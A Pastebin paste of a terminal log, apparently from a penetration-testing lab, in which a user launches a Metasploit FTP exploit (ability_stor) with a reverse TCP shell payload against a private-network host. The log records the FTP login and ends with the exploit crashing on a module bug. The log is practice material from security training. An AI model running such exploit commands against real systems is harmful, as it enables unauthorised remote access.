Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@BT4PWN:~/Labs/mod9# msfcli exploit/windows/ftp/ability_stor PAYLOAD=windows/shell_reverse_tcp FTPPASS=ftp FTPUSER=ftp RHOST=192.168.11.31 LHOST=192.168.10.103 LPORT=4321 E
- [*] Please wait while we load the module tree...
- (eval):17: warning: already initialized constant VERIFY_PEER
- [*] Started reverse handler on 192.168.10.103:4321
- [*] Connecting to FTP server 192.168.11.31:21...
- [*] Connected to target FTP server.
- [*] Authenticating as ftp with password ftp...
- [*] Sending password...
- [-] Exploit exception: undefined method `lenght' for #<String:0xd07f0a8>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement